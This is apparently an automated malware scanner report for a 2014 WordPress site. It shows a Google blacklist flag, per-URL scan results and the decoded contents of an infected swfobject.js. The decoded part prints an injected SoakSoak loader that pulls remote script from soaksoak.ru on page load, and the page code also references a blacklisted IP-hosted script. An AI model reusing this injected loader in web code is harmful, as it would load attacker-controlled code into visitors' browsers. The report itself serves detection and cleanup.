New scan:

Malware Scanner report for al-emaragroup.com

Malicious/Suspicious/Total urls checked
1/1/14
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "al-emaragroup.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=al-emaragroup.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://al-emaragroup.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 20:19:17 GMT
Location: http://www.al-emaragroup.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
X-Pingback: http://www.al-emaragroup.com/xmlrpc.php
clean
http://www.al-emaragroup.com/
200 OK
Content-Length: 20193
Content-Type: text/html
suspicious
Page code contains blacklisted domain: 122.155.168.105

...[1813 bytes skipped]...
h1, h2, h3, h4, h5 #main .comment-title, .four_o_four, .callout-wrap span, .search-title,.callout2, .comment-author-about, .logo-text {font-family:'Josefin Sans', Arial, sans-serif;}
</style>
<!--[if lte IE 8]>
<link rel="stylesheet" type="text/css" href="http://www.al-emaragroup.com/wp-content/themes/Karma/css/lt8.css" media="screen"/>
<![endif]-->
<script type="text/javascript" src="http://122.155.168.105/ads/inge :: jQuery 2 -->
<script type='text/javascript'>
//<![CDATA[
jQuery(window).load(function(){
jQuery('.home-banner-wrap ul').css('background-image','none');
jQuery('.jqslider').css('display','block');
jQuery('.big-banner #main .main-area').css('padding-top','16px');
jQuery('.home-banner-wrap ul').after('<div class="jquery-pager">&nbsp;</div>').cycle({
fx: 'fade',
timeout: '8000',
height: 'auto
...[1867 bytes skipped]...

http://www.al-emaragroup.com/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93085
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-includes/js/swfobject.js?ver=2.2-20120417
200 OK
Content-Length: 10997
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: soaksoak.ru

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLow
...[3673 bytes skipped]...

Decoded script:


function f() {
if (J) {
return;
}
try {
var Z = j.getElementsByTagName("body")[0].appendChild(C("span"));
Z.parentNode.removeChild(Z);
} catch (aa) {
return;
}
J = true;
var X = U.length;
for (var Y = 0; Y < X; Y++) {
U[Y]();
}
}
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());

http://122.155.168.105/ads/inpage/pub/collect.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://122.155.168.105/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://www.clickevents.com.my/scripts/collect.js
200 OK
Content-Length: 2920
Content-Type: application/x-javascript
clean
http://www.al-emaragroup.com/wp-content/themes/Karma/truethemes_framework/js/truethemes.js?ver=2.0
200 OK
Content-Length: 9661
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-content/themes/Karma/truethemes_framework/js/jquery.cycle.all.min.js?ver=2.9.4
200 OK
Content-Length: 31539
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-content/themes/Karma/truethemes_framework/js/jquery.prettyPhoto.js?ver=1.0
200 OK
Content-Length: 26268
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-includes/js/comment-reply.js?ver=1.0
200 OK
Content-Length: 1222
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-content/themes/Karma/truethemes_framework/js/superfish.js?ver=1.0
200 OK
Content-Length: 4072
Content-Type: application/javascript
clean
http://www.al-emaragroup.com/wp-content/themes/Karma/truethemes_framework/js/hoverIntent.js?ver=1.0
200 OK
Content-Length: 3174
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: al-emaragroup.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 20:19:17 GMT
Location: http://www.al-emaragroup.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
X-Pingback: http://www.al-emaragroup.com/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: al-emaragroup.com
Referer: http://www.google.com/search?q=al-emaragroup.com

Result:
The result is similar to the first query. There are no suspicious redirects found.